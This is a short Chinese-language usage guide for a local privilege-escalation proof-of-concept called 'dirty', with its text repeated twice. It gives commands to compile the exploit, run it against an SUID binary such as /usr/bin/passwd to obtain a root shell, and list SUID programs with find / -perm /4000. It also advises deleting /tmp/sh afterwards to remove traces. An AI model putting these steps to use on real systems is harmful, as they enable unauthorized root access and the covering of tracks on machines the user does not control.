-
编译
在linux中
gcc -o dirty dirty.c编译POC程序 -
使用
./dirty SUID执行程序。其中,SUID是指具有SUID的程序的路径一般可以用
/usr/bin/passwd,也就是执行./dirty /usr/bin/passwd
可以获取root的shell
-
可以使用
find / -perm /4000查询具有SUID的程序。
-
别忘了删除
/tmp/sh
编译
在linux中 gcc -o dirty dirty.c编译POC程序
使用
./dirty SUID执行程序。其中,SUID是指具有SUID的程序的路径
一般可以用 /usr/bin/passwd,也就是执行./dirty /usr/bin/passwd
可以获取root的shell
可以使用find / -perm /4000查询具有SUID的程序。
别忘了删除 /tmp/sh
